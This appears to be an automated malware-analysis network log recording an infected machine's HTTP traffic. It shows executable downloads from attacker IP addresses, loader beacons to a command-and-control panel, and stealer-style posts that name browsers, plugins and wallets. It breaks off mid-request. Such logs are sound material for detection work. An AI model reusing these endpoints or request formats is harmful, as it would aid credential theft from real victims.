Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 15:49:56 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: GET /files/7427009775/dwVrTdy.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 34 33 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014430001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/7427009775/AzVRM7c.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 34 33 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014431001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/7427009775/t5abhIx.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 34 33 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014432001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/8199790517/u1w30Wt.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 34 33 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014439001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 34 34 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014440001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 34 34 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014441001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 34 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014442001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 42 33 41 36 39 44 41 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 2d 2d 0d 0a Data Ascii: ------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="hwid"2DB3A69DAA6E2371543510------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="build"stok------FCGIJDBAFCBAAKECGDGC--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFBAEBKJKFIDHJJKJKHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 42 41 45 42 4b 4a 4b 46 49 44 48 4a 4a 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 34 30 64 35 36 61 62 39 34 34 63 36 38 31 36 64 61 36 62 64 33 37 66 33 38 36 64 30 62 39 62 38 32 66 37 36 31 36 30 34 34 64 39 36 63 61 31 35 33 36 35 34 30 36 65 34 63 36 35 31 61 61 33 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 42 41 45 42 4b 4a 4b 46 49 44 48 4a 4a 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 42 41 45 42 4b 4a 4b 46 49 44 48 4a 4a 4b 4a 4b 2d 2d 0d 0a Data Ascii: ------HDAFBAEBKJKFIDHJJKJKContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------HDAFBAEBKJKFIDHJJKJKContent-Disposition: form-data; name="message"browsers------HDAFBAEBKJKFIDHJJKJK--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJECFHCBKKEBAKFIJDHIHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 43 46 48 43 42 4b 4b 45 42 41 4b 46 49 4a 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 34 30 64 35 36 61 62 39 34 34 63 36 38 31 36 64 61 36 62 64 33 37 66 33 38 36 64 30 62 39 62 38 32 66 37 36 31 36 30 34 34 64 39 36 63 61 31 35 33 36 35 34 30 36 65 34 63 36 35 31 61 61 33 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 43 46 48 43 42 4b 4b 45 42 41 4b 46 49 4a 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 43 46 48 43 42 4b 4b 45 42 41 4b 46 49 4a 44 48 49 2d 2d 0d 0a Data Ascii: ------KJECFHCBKKEBAKFIJDHIContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------KJECFHCBKKEBAKFIJDHIContent-Disposition: form-data; name="message"plugins------KJECFHCBKKEBAKFIJDHI--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFHJDAEHIEHJJKFBGDAHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 34 30 64 35 36 61 62 39 34 34 63 36 38 31 36 64 61 36 62 64 33 37 66 33 38 36 64 30 62 39 62 38 32 66 37 36 31 36 30 34 34 64 39 36 63 61 31 35 33 36 35 34 30 36 65 34 63 36 35 31 61 61 33 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 2d 2d 0d 0a Data Ascii: ------KKFHJDAEHIEHJJKFBGDAContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------KKFHJDAEHIEHJJKFBGDAContent-Disposition: form-data; name="message"fplugins------KKFHJDAEHIEHJJKFBGDA--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 34 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014443001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJDGHCBGDHIECBGIDAEHost: 185.215.113.206Content-Length: 6907Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11If-Modified-Since: Wed, 11 Dec 2024 08:22:24 GMTIf-None-Match: "67594bc0-b1a00"
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 31 34 34 34 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1014444001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/encoxx/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKEHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 34 30 64 35 36 61 62 39 34 34 63 36 38 31 36 64 61 36 62 64 33 37 66 33 38 36 64 30 62 39 62 38 32 66 37 36 31 36 30 34 34 64 39 36 63 61 31 35 33 36 35 34 30 36 65 34 63 36 35 31 61 61 33 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 2d 2d 0d 0a Data Ascii: ------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="file"------IIJEBFCFIJJJEBGDBAKE--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 34 34 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014445001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/hell911/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 34 34 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014446001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKEHJJDAAAAKECBGHDHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 34 30 64 35 36 61 62 39 34 34 63 36 38 31 36 64 61 36 62 64 33 37 66 33 38 36 64 30 62 39 62 38 32 66 37 36 31 36 30 34 34 64 39 36 63 61 31 35 33 36 35 34 30 36 65 34 63 36 35 31 61 61 33 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 2d 2d 0d 0a Data Ascii: ------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="file"------JEBKEHJJDAAAAKECBGHD--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECFIJDAAAKECBFCGHIHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBGDHIIDAEBFHJJDBFIHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 34 30 64 35 36 61 62 39 34 34 63 36 38 31 36 64 61 36 62 64 33 37 66 33 38 36 64 30 62 39 62 38 32 66 37 36 31 36 30 34 34 64 39 36 63 61 31 35 33 36 35 34 30 36 65 34 63 36 35 31 61 61 33 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 2d 2d 0d 0a Data Ascii: ------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; 